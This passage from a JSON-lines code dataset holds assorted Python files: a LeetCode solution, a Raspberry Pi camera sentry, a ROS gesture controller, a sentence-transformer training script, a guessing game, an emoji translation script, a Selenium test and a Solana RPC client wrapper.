vpc=networking.vpc,\n file_system=storage.file_system,\n access_point=storage.access_point,\n timeout=Duration.minutes(10),\n )\n","repo_name":"FarrOut/JenkinsCDK","sub_path":"jenkins/jenkins_stack.py","file_name":"jenkins_stack.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35557607235","text":"from typing import List\n\n\ndef dfs(arr, index: int, max_len: list, lis_set: set):\n if index>= len(arr):\n return\n word = set(arr[index])\n if len(word) != len(arr[index]) or len(word.intersection(lis_set)) != 0:\n dfs(arr, index + 1, max_len, lis_set)\n else:\n for w in word:\n lis_set.add(w)\n if max_len[0] < len(lis_set):\n max_len[0] = len(lis_set)\n dfs(arr, index + 1, max_len, lis_set)\n for w in word:\n lis_set.remove(w)\n 
dfs(arr, index + 1, max_len, lis_set)\n\n\nclass Solution:\n def maxLength(self, arr: List[str]) -> int:\n max_len = [0]\n lis_set = set()\n dfs(arr, 0, max_len, lis_set)\n return max_len[0]\n\n\nif __name__ == '__main__':\n arr = [\"cha\", \"r\", \"act\", \"ers\"]\n print(Solution().maxLength(arr))\n","repo_name":"CAM1113/leetcode","sub_path":"dfs/main1239.py","file_name":"main1239.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3893211128","text":"import cv2\nimport numpy\nimport picamera\n\nimport sys, os\nimport pathlib\nimport datetime\nimport io\nimport json\nimport shutil\nimport time\nimport traceback\n\nfrom scripts.config import ConfigManager\nfrom scripts.log import LogManager\n\nlogManager = LogManager('/home/pi/temp/sentry/log')\nlog = logManager.log\n\nlastRequestProcessingTime = None\n\ndef processArguments():\n\tburst = False\n\tcontinuous = False\n\trapid = False\n\tupdateBase = False\n\n\tfor idx, arg in enumerate(sys.argv):\n\t\tif arg == 'cont':\n\t\t\tcontinuous = True\n\t\telif arg == 'rapid':\n\t\t\trapid = True\n\t\telif arg == 'base':\n\t\t\tupdateBase = True\n\t\telif arg == 'burst':\n\t\t\tburst = True\n\n\treturn {\n\t\t'burst': burst,\n\t\t'continuous': continuous,\n\t\t'rapid': rapid,\n\t\t'updateBase': updateBase,\n\t}\n\ndef imgsum(img, config):\n\tdecimationX = config['decimationX']\n\tdecimationY = config['decimationY']\n\n\tsum = 0\n\tfor i in range(len(img)):\n\t\tif int(i % decimationY) == 0:\n\t\t\tfor j in range(len(img[i])):\n\t\t\t\tif int(j % decimationX) == 0:\n\t\t\t\t\tfor k in range(0, 3):\n\t\t\t\t\t\tsum += img[i][j][k]\n\t\t\t\t\t\t\n\treturn sum\n\ndef benchmark(func, desc = None, configManager = None):\n\tlog = configManager.log\n\n\tt1 = datetime.datetime.utcnow()\n\tfunc()\t\n\tt2 = datetime.datetime.utcnow()\n\n\tout = f\"Total time: {t2 - t1}\"\n\tif desc:\n\t\tout += f\" ({desc})\"\n\n\tlog(out)\n\ndef currentTimeFileName():\n\treturn datetime.datetime.utcnow().strftime('%Y-%m-%dZ%H-%M-%S-%f.jpg')\n\ndef snapshots(pathSnapshots, camera, continuous = False, name = \"temp\", arguments = {}, configuration = {}, configManager = None):\n\tlog = configManager.log\n\n\tburst = arguments['burst']\n\tcontinuous = arguments['continuous']\n\trapid = arguments['rapid']\n\n\toutSize = (configuration['outputWidth'], configuration['outputHeight'])\n\tpathBaseImage = configuration['pathBaseImage']\n\tpathSnapshots = configuration['pathSnapshots']\n\tquality = configuration['quality']\n\ttolerance = configuration['tolerance']\n\n\tbaseSum = configManager.get(['baseSum'])\n\n\tstream = io.BytesIO()\n\n\tfor frame in camera.capture_continuous(stream, format='jpeg', resize = outSize, quality = quality, use_video_port = rapid, burst = burst):\n\t\tif configuration['isPaused']:\n\t\t\tstreambytes = None\n\t\t\tframe.seek(0)\n\t\t\tframe.truncate() # avoid memory 'leak'\n\t\telse:\n\t\t\tframe.seek(0)\n\t\t\tstreambytes = frame.read()\n\t\t\tframe.seek(0)\n\n\t\t\tbytes = numpy.asarray(bytearray(streambytes), numpy.uint8)\n\t\t\timg = cv2.imdecode(bytes, cv2.IMREAD_COLOR)\n\t\t\tsum = imgsum(img, configuration)\n\t\t\t\n\t\t\tdiff = abs(baseSum - sum)\n\t\t\tpercent = diff / baseSum\n\t\t\tsave = percent > tolerance\n\t\t\t\n\t\t\tlog(f\"baseSum {baseSum}, sum {sum}, percent {percent}, tolerance {tolerance}, save {save}\")\n\n\t\t\tframe.truncate()\t\t\n\t\t\t\n\t\t\tif not continuous or save:\n\t\t\t\tif name == \"temp\":\n\t\t\t\t\tfinal = 
f\"{pathSnapshots}/{currentTimeFileName()}\"\n\t\t\t\telse:\n\t\t\t\t\tfinal = pathBaseImage\n\t\t\t\t\n\t\t\t\twith open(final, 'wb') as f:\n\t\t\t\t\tf.write(streambytes)\n\t\t\t\t\n\t\t\t\tlog(f\"Saved snapshot {final!r} with a difference of {percent}\")\n\t\t\t\t\n\t\t\t\tif not save:\n\t\t\t\t\tbreak\n\t\t\n\t\tconfiguration = configManager.process(streambytes)\n\t\tif configuration['requests']['reinitialize']:\n\t\t\tbreak\n\n\treturn {\n\t\t'lastSum': sum\n\t}\n\t\t\t\t\ndef main(dirRoot = '/home/pi/temp/sentry', skipSleep = False, overrides = {}):\n\tlogManager = LogManager(dirRoot)\n\tlog = logManager.log\n\n\tlog(\"==========\tStarting up\t==========\")\n\n\tconfigManager = ConfigManager(dirRoot, logManager, overrides = overrides)\n\n\tconfiguration = {}\n\targuments = {}\n\n\tconfiguration = configManager.process()\n\n\tpathBaseImage = configuration['pathBaseImage']\n\tpathSnapshots = configuration['pathSnapshots']\n\n\tif (not os.path.isdir(pathSnapshots)):\n\t\tpathlib.Path(pathSnapshots).mkdir(parents = True, exist_ok = True)\n\t\tlog(f\"Created '{pathSnapshots}'\")\n\n\tbaseImageMissing = False\n\tif (not os.path.isfile(pathBaseImage)):\n\t\tbaseImageMissing = True\n\n\targuments = processArguments()\n\n\treinitialize = True\n\n\twhile reinitialize:\n\t\treinitialize = configManager.set(['requests', 'reinitialize', False])\n\n\t\tlog(\"Initializing camera...\")\n\n\t\twith picamera.PiCamera() as camera:\n\t\t\tlog(\"Camera initalized\")\n\n\t\t\ttry:\n\t\t\t\tcameraSettings = configManager.get(['cameraSettings'])\n\t\t\t\tlog(f\"Initializing camera settings from {cameraSettings}\")\n\n\t\t\t\tawbMode = cameraSettings['awbMode']\n\t\t\t\tcrop = cameraSettings['crop']\n\t\t\t\texposureMode = cameraSettings['exposureMode']\n\t\t\t\tframerate = cameraSettings['framerate']\n\t\t\t\tiso = cameraSettings['iso']\n\t\t\t\tres = cameraSettings['res']\n\t\t\t\trotation = cameraSettings['rotation']\n\t\t\t\tshutterSpeed = cameraSettings['shutterSpeed']\n\n\t\t\t\tcamera.resolution = res\n\t\t\t\tcamera.rotation = rotation\n\t\t\t\tcamera.crop = crop\n\t\t\t\tcamera.framerate = framerate\n\t\t\t\tcamera.iso = iso\n\n\t\t\t\tif not skipSleep:\n\t\t\t\t\tlog(\"Sleeping 2 seconds\")\n\t\t\t\t\ttime.sleep(2)\n\n\t\t\t\tcamera.shutter_speed = shutterSpeed\n\t\t\t\tcamera.exposure_mode = exposureMode\n\t\t\t\tg = camera.awb_gains\n\t\t\t\tcamera.awb_mode = awbMode\n\t\t\t\tcamera.awb_gains = g\n\n\t\t\t\tcamera.start_preview()\n\n\t\t\t\tlog(\"Started camera preview\")\n\n\t\t\t\tif (baseImageMissing):\n\t\t\t\t\tlog(\"Base image missing\")\n\t\t\t\t\tres = snapshots(pathSnapshots, camera, name = \"base\", arguments = arguments, configuration = configuration, configManager = configManager)\n\t\t\t\t\tlastSum = int(res['lastSum'])\n\t\t\t\t\tconfigManager.set(['baseSum', lastSum])\n\t\t\t\t\tshutil.copyfile(pathBaseImage, f\"{pathSnapshots}/{currentTimeFileName()}\")\n\t\t\t\t\tlog(f\"Initiated base image and copied into '{pathSnapshots}' with '{lastSum}'\")\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\tbaseSum = imgsum(cv2.imread(pathBaseImage, cv2.IMREAD_COLOR), configuration)\n\t\t\t\texcept:\n\t\t\t\t\tlog(\"Failed to get baseSum\")\n\t\t\t\t\tbaseSum = -1\n\n\t\t\t\tif baseSum != configuration['baseSum']:\n\t\t\t\t\tlog(F\"Updating baseSum config value to {baseSum}\")\n\t\t\t\t\tconfigManager.set(['baseSum', int(baseSum)])\n\t\t\t\t\n\t\t\t\tcontinuous = arguments['continuous']\n\t\t\t\tupdateBase = arguments['updateBase']\n\n\t\t\t\tif continuous:\n\t\t\t\t\tlog(\"Entering snapshot 
loop\")\n\t\t\t\t\tsnapshots(pathSnapshots, camera, True, baseSum = baseSum, configuration = configuration, arguments = arguments, configManager = configManager)\n\n\t\t\t\t\tconfiguration = configManager.process()\n\t\t\t\t\tif configManager.get(['requests', 'reinitialize']):\n\t\t\t\t\t\treinitialize = True\n\t\t\t\telse:\n\t\t\t\t\tif updateBase:\n\t\t\t\t\t\tbenchmark(lambda: snapshots(pathSnapshots, camera, name = \"base\", configuration = configuration, arguments = arguments, configManager = configManager), configManager = configManager)\n\t\t\t\t\telse:\n\t\t\t\t\t\tbenchmark(lambda: snapshots(pathSnapshots, camera, configuration = configuration, arguments = arguments, configManager = configManager), configManager = configManager)\n\t\t\t\n\t\t\texcept:\n\t\t\t\tlog(f\"\\nException info 1: {sys.exc_info()[0]}\\nException info 2: {sys.exc_info()[1]}\\nException traceback: {traceback.print_tb(sys.exc_info()[2])}\")\n\t\t\t\t\n\t\t\tfinally:\n\t\t\t\tcamera.stop_preview()\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\tfinally:\n\t\tlog(\"========== Shutting down ==========\")\n","repo_name":"mikeboharsik/sentry","sub_path":"snapshot_gen/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29697081890","text":"#!/home/jetson/archiconda3/envs/hand_controller/bin python3.8\nimport cv2\nimport time\nimport os\n\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom geometry_msgs.msg import Twist\n\nimport HandTrackingModule as htm\nwCam, hCam = 640, 480\n\npTime = 0\ndetector = htm.handDetector(detectionCon=0.75)\ntipIds = [4, 8, 12, 16, 20]\nrospy.init_node('webcam_display', anonymous=True)\ncmd_pub = rospy.Publisher('/cmd_vel',Twist,queue_size=10)\ncmd_msg = Twist()\nwhile not rospy.is_shutdown():\n # print(2)\n msg =rospy.wait_for_message(\"fisheye\", Image, timeout=0.1)\n bridge = CvBridge()\n img = bridge.imgmsg_to_cv2(msg, \"bgr8\")\n # print(3)\n img = detector.findHands(img)\n # print(4)\n lmList = detector.findPosition(img, draw=False)\n # print(lmList)\n if len(lmList) != 0:\n fingers = []\n # Thumb\n if lmList[tipIds[0]][1] > lmList[tipIds[0] - 1][1]:\n fingers.append(1)\n else:\n fingers.append(0)\n # 4 Fingers\n for id in range(1, 5):\n if lmList[tipIds[id]][2] < lmList[tipIds[id] - 2][2]:\n fingers.append(1)\n else:\n fingers.append(0)\n # print(fingers)\n totalFingers = fingers.count(1)\n print(totalFingers)\n if (5-totalFingers) == 0:\n cmd_msg.linear.x = 1\n cmd_msg.angular.z = 0\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n elif (5-totalFingers) == 1:\n cmd_msg.linear.x = -1\n cmd_msg.angular.z = 0\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n elif (5-totalFingers) == 2:\n cmd_msg.linear.x = 0\n cmd_msg.angular.z = 0.5\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n elif (5-totalFingers) == 3:\n cmd_msg.linear.x = 0\n cmd_msg.angular.z = -0.5\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n else:\n cmd_msg.linear.x = 0\n cmd_msg.angular.z = 0\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = 
%0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n\n cv2.rectangle(img, (20, 225), (170, 425), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, str(5-totalFingers), (45, 375), cv2.FONT_HERSHEY_PLAIN,\n 10, (255, 0, 0), 25)\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n cv2.putText(img, f'FPS: {int(fps)}', (400, 70), cv2.FONT_HERSHEY_PLAIN,\n 3, (255, 0, 0), 3)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n","repo_name":"robot-WT/gesture-recognition","sub_path":"image_pub/scripts/FingerCounter.py","file_name":"FingerCounter.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"42804763220","text":"\n#%%\nimport sys,os,gzip,csv,math\nsys.path.insert(0,'..')\nfrom sentence_transformers import models, losses, datasets\nfrom sentence_transformers import LoggingHandler, SentenceTransformer, util, InputExample\nfrom sentence_transformers.evaluation import EmbeddingSimilarityEvaluator,TripletEvaluator,SequentialEvaluator\nimport logging\nfrom datetime import datetime\nfrom eval import process_sts\nfrom data_utils import get_sbert_nli_data,add_to_samples,nli2triplet_sets,transform2triplet_inputexamples,load_all_nli_from_HF,get_HF_nli_dev_test\n\n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n\n#%%\ndef prepare_anli_training_examples(data_path='/home/chuang/Dev/DATA/raw_data'):\n # Read the AllNLI.tsv.gz file and create the training dataset\n #Check if dataset exsist. If not, download and extract it\n nli_dataset_path = os.path.join(data_path,'AllNLI.tsv.gz')\n get_sbert_nli_data(nli_dataset_path)\n # read and transform data \n with gzip.open(nli_dataset_path, 'rt', encoding='utf8') as fIn:\n reader = csv.DictReader(fIn, delimiter='\\t', quoting=csv.QUOTE_NONE)\n train_data = nli2triplet_sets(reader,filter_key='split',split='train')\n print('Print one dict item')\n print(next(iter(train_data.items())))\n # transform into triples training examples \n train_samples = transform2triplet_inputexamples(train_data)\n return train_samples\n\ndef prepare_allHFnli_training_examples():\n \n ## load all train split from 2 nli datasets from HF: https://huggingface.co/datasets?sort=downloads&search=nli\n ## anli; snli and multi_nli \n HF_datasets = load_all_nli_from_HF(nli_ds_names=['multi_nli','anli','snli'],split='train')\n ## transform to the same train_data fromat \n train_data = nli2triplet_sets(iter(HF_datasets))\n ## transform to same input examples \n train_samples = transform2triplet_inputexamples(train_data)\n \n return train_samples\n\ndef get_sts_evaluator():\n ## get data and setup evaluator \n sts_samples = process_sts()\n sts_evaluator = EmbeddingSimilarityEvaluator.from_input_examples(\n sts_samples, name='sts_eval',show_progress_bar=True,write_csv=True\n )\n return sts_evaluator\n\ndef get_triplet_loss_evaluator(split_name='dev'):\n sample = get_HF_nli_dev_test(split_name=split_name)\n \n t_evaluator = TripletEvaluator.from_input_examples(\n sample, name=split_name,show_progress_bar=True,write_csv=True\n )\n \n return t_evaluator\ndef maybe_create_dir(fp):\n if os.path.exists(fp):\n pass\n else:\n os.mkdir(fp)\n return fp\n#%%\n\nif __name__ == \"__main__\":\n \n model_name = 'distilroberta-base'\n train_batch_size = 128 #The larger you select this, the better the results (usually). 
But it requires more GPU memory\n max_seq_length = 75\n num_epochs = 1\n model_save_path = '/home/chuang/Dev/DATA/Model/training_nli_v2_'+model_name.replace(\"/\", \"-\")+'-'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n data_path = '/home/chuang/Dev/DATA/raw_data'\n\n ###############################################################\n ## use different functions to loda different training data ####\n ###############################################################\n \n logging.info(\"Read AllNLI train dataset\")\n #train_samples = prepare_anli_training_examples(data_path)\n train_samples = prepare_allHFnli_training_examples()\n logging.info(\"Train samples: {}\".format(len(train_samples)))\n # Special data loader that avoid duplicates within a batch\n train_dataloader = datasets.NoDuplicatesDataLoader(train_samples, batch_size=train_batch_size)\n \n ##############################################################################\n ## setup model; use differenct function for differnt model initialization ####\n ##############################################################################\n # Here we define our SentenceTransformer model\n word_embedding_model = models.Transformer(model_name, max_seq_length=max_seq_length)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension(), pooling_mode='mean')\n model = SentenceTransformer(modules=[word_embedding_model, pooling_model])\n\n # Our training loss\n logging.info('User multipleNegativesRankingLoss')\n train_loss = losses.MultipleNegativesRankingLoss(model)\n \n ##########################\n ## setup evaluator ####\n ##########################\n # set up evaluator for sbert : use sementic similary score \n Semetic_similarity_evaluator = get_sts_evaluator()\n # set up evaluator using : use sementic similary score \n Triplet_evaluator_dev = get_triplet_loss_evaluator(split_name='dev')\n Triplet_evaluator_test = get_triplet_loss_evaluator(split_name='test')\n\n Multi_evaluator = SequentialEvaluator([Semetic_similarity_evaluator,Triplet_evaluator_dev],\n main_score_function=lambda x:x) ## report both scores \n ## see https://www.sbert.net/docs/package_reference/evaluation.html#sentence_transformers.evaluation.SequentialEvaluator\n\n#%%\n # Configure the training\n warmup_steps = math.ceil(len(train_dataloader) * num_epochs * 0.01) #1% of train data for warm-up\n logging.info(\"Warmup-steps: {}\".format(warmup_steps))\n\n ## do inital eval before training\n maybe_create_dir(model_save_path)\n Multi_evaluator(model,model_save_path)\n\n #%%\n # Train the model\n model.fit(train_objectives=[(train_dataloader, train_loss)],\n optimizer_params = {'lr': 2e-5},\n scheduler='WarmupLinear',\n evaluator=Triplet_evaluator_dev,\n epochs=num_epochs,\n evaluation_steps=int(len(train_dataloader)*0.05),\n #checkpoint_save_steps = int(len(train_dataloader)*0.05)\n warmup_steps=warmup_steps,\n output_path=model_save_path,\n use_amp=False #Set to True, if your GPU supports FP16 operations\n )\n\n\n","repo_name":"johnsonice/HuggingFace_Demos","sub_path":"examples/sentence_bert_applications/task_specific_training/train_nli.py","file_name":"train_nli.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16314366742","text":"from art import logo\nimport random\n\nEASY_LEVEL_TURNS = 10\nHARD_LEVEL_TURNS = 5\n\ndef set_difficulty():\n level = input(\"Choose your difficulty. 
Type 'easy' or 'hard': \")\n    if level == 'easy':\n        return EASY_LEVEL_TURNS\n    elif level == 'hard':\n        return HARD_LEVEL_TURNS\n\ndef check_answer(answer, number, turns):\n    if answer > number:\n        print(\"Too High\")\n        return turns - 1\n    if answer < number:\n        print(\"Too Low\")\n        return turns - 1\n    if answer == number:\n        print(f\"You got it! The answer was {answer}\")\n        return turns\n\ndef game():\n\n    print(\"Welcome to the Number Guessing Game!\")\n    print(\"I'm thinking of a number between 1 and 100.\")\n    chosen_number = random.randint(1, 100)\n\n    turns = set_difficulty()\n\n    guess = 0\n    while guess != chosen_number:\n        print(f\"You have {turns} attempts remaining to guess the number.\")\n\n        guess = int(input(\"Make a guess: \"))\n        turns = check_answer(guess, chosen_number, turns)\n\n        if turns == 0:\n            print(\"You've run out of guesses. You lose\")\n            return print(f\"The correct answer was {chosen_number}.\")\n        elif guess != chosen_number:\n            print(\"Guess again.\")\n\n\nprint(logo)\ngame()","repo_name":"CheddarP/The-Number-Game","sub_path":"numbergame.py","file_name":"numbergame.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7791440803","text":"from google.cloud import translate_v2 as translate\ntranslate_client = translate.Client()\n\n\nsource = open(\"emoji_utf8_lexicon.txt\", 'r')\noutput = open(\"emoji.txt\", 'w')\n\nfor line in source.readlines():\n    #print(\"line[0] ->\" + line.split('\\t')[0] + \"\\nline[1] ->\" + line.split('\\t')[1].strip() + \"\\n\")\n    #output_line = line.split('\\t')[0] + \"\\t\" + line.split('\\t')[1].strip() + \"\\n\"\n    #print(output_line)\n    result = translate_client.translate(\n        line.split('\\t')[1].strip(), target_language='pl')\n    #print(result)\n    if result['detectedSourceLanguage'] == 'en':\n        output_line = line.split('\\t')[0].strip() + \"\\t\" + result['translatedText'].strip() + \"\\n\"\n    else:\n        output_line = line\n    print(line + output_line)\n    output.write(output_line)\n\n","repo_name":"kswierad/PolishVader","sub_path":"vaderSentiment/translate_emoji.py","file_name":"translate_emoji.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33380307871","text":"from Lib import LIB\nfrom POM.BDG_Home import Home\n\n'''\n1. Go to URL\n2. Click on Our Trainers\n3. Check Trainers page title\n4. Check Trainers page url\n5. Check Trainers page letters\n6. 
Close browser\n'''\n\ndef test_1():\n try:\n\n #open browser\n obj_lib = LIB()\n browser = obj_lib.open_browser()\n\n #create objects\n obj_home = Home(browser)\n\n #steps\n obj_lib.page_load(browser)\n obj_lib.wait_for_element(browser, obj_home.our_trainers).click()\n assert browser.title == obj_lib.get_data(\"our_trainers_page_title\")\n assert browser.current_url == obj_lib.get_data( \"our_trainers_page_url\")\n assert obj_lib.get_data(\"our_trainers_page_letter\") in browser.page_source\n\n except Exception as exp:\n obj_lib.write_to_file(f\"In case 5, error reason is -{exp}\")\n obj_lib.save_screenshot(browser, \"Case_5\")\n raise exp\n\n finally:\n # Close browser\n obj_lib.close_browser(browser)\n\n","repo_name":"Margar1999/BDG_website_testing","sub_path":"Test/test_Case_5_Check_Trainers_page_letters.py","file_name":"test_Case_5_Check_Trainers_page_letters.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27207844631","text":"import logging\nimport random\nimport signal\nimport time\nfrom contextlib import contextmanager\nfrom typing import Optional, Union\n\nfrom solana.keypair import Keypair\nfrom solana.publickey import PublicKey\nfrom solana.rpc.api import Client, Commitment\nfrom solana.rpc.types import TokenAccountOpts\nfrom src.exceptions import UnsupportedVersionError\nfrom src.solana.solana_helpers import SPL_TOKEN_ID_PK\nfrom src.solana.solana_transaction_types import (\n ConfirmedSignatureForAddressResponse,\n ConfirmedTransaction,\n)\n\nlogger = logging.getLogger(__name__)\n\n# maximum number of times to retry get_confirmed_transaction call\nDEFAULT_MAX_RETRIES = 5\n# number of seconds to wait between calls to get_confirmed_transaction\nDELAY_SECONDS = 0.2\nUNSUPPORTED_VERSION_ERROR_CODE = -32015\n\n\nclass SolanaClientManager:\n def __init__(self, solana_endpoints) -> None:\n self.endpoints = solana_endpoints.split(\",\")\n self.clients = [Client(endpoint) for endpoint in self.endpoints]\n\n def get_client(self, randomize=False) -> Client:\n if not self.clients:\n raise Exception(\n \"solana_client_manager.py | get_client | There are no solana clients\"\n )\n if not randomize:\n return self.clients[0]\n index = random.randrange(0, len(self.clients))\n return self.clients[index]\n\n def get_sol_tx_info(\n self, tx_sig: str, retries=DEFAULT_MAX_RETRIES, encoding=\"json\"\n ):\n \"\"\"Fetches a solana transaction by signature with retries and a delay.\"\"\"\n\n def handle_get_sol_tx_info(client: Client, index: int):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n tx_info: ConfirmedTransaction = client.get_transaction(\n tx_sig, encoding\n )\n _check_error(tx_info, tx_sig)\n if tx_info[\"result\"] is not None:\n return tx_info\n # We currently only support \"legacy\" solana transactions. 
If we encounter\n # a newer version, raise this specific error so that it can be handled upstream.\n except UnsupportedVersionError as e:\n raise e\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_sol_tx_info | \\\n Error fetching tx {tx_sig} from endpoint {endpoint}, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_sol_tx_info | Retrying tx fetch: {tx_sig} with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_sol_tx_info | Failed to fetch {tx_sig} with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n handle_get_sol_tx_info,\n f\"solana_client_manager.py | get_sol_tx_info | All requests failed to fetch {tx_sig}\",\n )\n\n def get_signatures_for_address(\n self,\n account: Union[str, Keypair, PublicKey],\n before: Optional[str] = None,\n until: Optional[str] = None,\n limit: Optional[int] = None,\n retries: int = DEFAULT_MAX_RETRIES,\n ):\n \"\"\"Fetches confirmed signatures for transactions given an address.\"\"\"\n\n def handle_get_signatures_for_address(client: Client, index: int):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n transactions: ConfirmedSignatureForAddressResponse = (\n client.get_signatures_for_address(\n account, before, until, limit, Commitment(\"finalized\")\n )\n )\n return transactions\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | handle_get_signatures_for_address | \\\n Error fetching account {account} from endpoint {endpoint}, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | handle_get_signatures_for_address | Retrying account fetch: {account} with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | handle_get_signatures_for_address | Failed to fetch account {account} with endpoint {endpoint}\"\n )\n\n return _try_all_with_timeout(\n self.clients,\n handle_get_signatures_for_address,\n \"solana_client_manager.py | get_signatures_for_address | All requests failed\",\n )\n\n def get_slot(self, retries=DEFAULT_MAX_RETRIES, encoding=\"json\") -> Optional[int]:\n def _get_slot(client: Client, index):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n response = client.get_slot(Commitment(\"finalized\"))\n return response[\"result\"]\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_slot, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_slot | Retrying with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_slot | Failed with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n _get_slot,\n \"solana_client_manager.py | get_slot | All requests failed to fetch\",\n )\n\n def get_token_accounts_by_owner(\n self, owner: PublicKey, retries=DEFAULT_MAX_RETRIES\n ):\n def _get_token_accounts_by_owner(client: Client, index):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n response = client.get_token_accounts_by_owner(\n owner,\n TokenAccountOpts(\n program_id=SPL_TOKEN_ID_PK, encoding=\"jsonParsed\"\n ),\n )\n return response[\"result\"]\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_token_accounts_by_owner, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n 
f\"solana_client_manager.py | get_token_accounts_by_owner | Retrying with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_token_accounts_by_owner | Failed with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n _get_token_accounts_by_owner,\n \"solana_client_manager.py | get_token_accounts_by_owner | All requests failed to fetch\",\n )\n\n def get_account_info(self, account: PublicKey, retries=DEFAULT_MAX_RETRIES):\n def _get_account_info(client: Client, index):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n response = client.get_account_info(account)\n return response[\"result\"]\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_account_info, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_account_info | Retrying with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_account_info | Failed with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n _get_account_info,\n \"solana_client_manager.py | get_account_info | All requests failed to fetch\",\n )\n\n\n@contextmanager\ndef timeout(time):\n # Register a function to raise a TimeoutError on the signal.\n signal.signal(signal.SIGALRM, raise_timeout)\n # Schedule the signal to be sent after ``time``.\n signal.alarm(time)\n\n try:\n yield\n except TimeoutError: # pylint: disable=W0706\n raise\n finally:\n # Unregister the signal so it won't be triggered\n # if the timeout is not reached.\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n\n\ndef raise_timeout(signum, frame):\n raise TimeoutError\n\n\ndef _check_error(tx, tx_sig):\n if \"error\" in tx:\n logger.error(\n f\"solana_client_manager.py | _check_unsupported_version | Transaction {tx_sig} version is unsupported\"\n )\n raise UnsupportedVersionError()\n\n\ndef _try_all(iterable, func, message, randomize=False):\n \"\"\"Executes a function with retries across the iterable.\n If all executions fail, raise an exception.\"\"\"\n items = list(enumerate(iterable))\n items = items if not randomize else random.sample(items, k=len(items))\n for index, value in items:\n try:\n return func(value, index)\n except UnsupportedVersionError as e:\n raise e\n except Exception:\n logger.error(\n f\"solana_client_manager.py | _try_all | Failed attempt at index {index} for function {func}\"\n )\n if index < len(items) - 1:\n logger.info(\"solana_client_manager.py | _try_all | Retrying\")\n continue\n raise Exception(message)\n\n\ndef _try_all_with_timeout(iterable, func, message, randomize=False):\n \"\"\"Do not use this function with ThreadPoolExecutor,\n doesn't play well with futures\n\n Executes a function with retries across the iterable.\n If all executions fail, raise an exception.\"\"\"\n items = list(enumerate(iterable))\n items = items if not randomize else random.sample(items, k=len(items))\n for index, value in items:\n try:\n 